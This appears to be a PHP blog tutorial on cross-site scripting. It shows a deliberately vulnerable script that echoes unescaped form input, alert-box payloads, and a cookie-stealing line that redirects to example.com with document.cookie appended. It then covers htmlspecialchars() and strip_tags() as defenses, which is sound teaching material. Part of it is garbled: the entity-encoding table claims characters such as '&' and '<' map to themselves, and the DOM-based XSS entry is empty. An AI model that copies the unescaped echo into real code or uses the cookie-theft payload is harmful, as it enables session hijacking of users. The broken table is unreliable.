What is Cross Site Scripting (XSS). How to prevent this vulnerability in code.
XSS commonly known as cross-site scripting is a code injection technique or attack. In XSS user can inject any malicious HTML, Javascript or any other client side snippet on a web application. It is one of the major security attack after Sql Injection.
Cross Site Scripting (XSS) Examples
XSS vulnerability arises when your application takes the data from users without properly validating the data. This attack occurs if input field in not validated.
Let’s undestand this through example. Created simple form in which we take name from user.
|
1 2 3 4 |
<form action="data.php" method="post"> <input type="text" name="name" /> <input type="submit" name="submit" /> </form> |
What i do in this form is taking name from user and submitted it to my data.php file using POST method.
In data.php file let’s write simple PHP script.
|
1 2 3 4 5 6 7 8 9 10 |
<?php if(!empty($_POST['name'])){ echo '<b>'; echo $_POST['name']; echo '</b>'; } ?> |
This php snippet is just for demostration purpose. In real scenario may be you stored this value in you DB and display in your admin panel. But imagine what happens if user enter something like this.
|
1 |
<script>alert('XSS');</script> |
This Javascript snippet will popup and print XSS on screen.
|
1 |
<script>alert(document.cookie);</script> |
This print the user browser cookie value. Similarly they can push any malicious script on input field.
ii) Let’s take another example in which they steal the user cookie information.
|
1 2 3 4 |
<script> window.location = "http://example.com?id="+document.cookie; </script> |
What this script does is it sent the cookie information to some malicious site example.com . This type of malicious activity occur when you save some comment or post in your database (MySql etc) without validating input data. Next time any user open this post or comment in their browser there cookie information is passed on to example.com .
Types of XSS
i) Persistent or Stored XSS –
In persistent cross site scripting malicious code is stored in data store. Later when this code is render on website, malicious script is executed.
ii) Non Persistent (Reflected) XSS –
In this case malicious script is not stored on server rather that it is presented directly to the user.
iii) DOM based XSS –
Consequences of Cross-Site Scripting (XSS) Attack
i) Through XSS hacker can steal your private and confidential information.
ii) Steal user cookies information which contain session and other important data.
iii) Redirecting to other malicious websites.
iv) Showing IFRAMES which contain adds and annoying pop-ups.
How to Prevent Cross-Site Scripting (XSS) Attack
To prevent XSS attack always validate input fields .
PHP provides some in-built functions through which you can prevent XSS.
1. htmlspecialchars()
htmlspecialchars() method Convert special characters to HTML entities.
Let’s create one function validate which take string as an argument. It returns the value after encoding special characters to HTML entities.
|
1 2 3 4 5 6 |
/* Take string argument. */ function validate($string){ return htmlspecialchars($string,ENT_QUOTES,'UTF-8'); } |
Encoding performed are-
‘&’ (ampersand) becomes ‘&’
‘”‘ (double quote) becomes ‘"’ when ENT_NOQUOTES is not set.
“‘” (single quote) becomes ‘'’ (or ') only when ENT_QUOTES is set.
‘<‘ (less than) becomes ‘<’
‘>’ (greater than) becomes ‘>’
Check more about htmlspecialchars() function on php.net community.
2. strip_tags()
It will remove PHP and HTML tags from a string.
|
1 |
strip_tags($_POST['name']); |
Tools to Check XSS Vulnerability
In my previous post i mentioned some plugins and tools which is used to check sql injection. The same tools can be used to check XSS attack also.
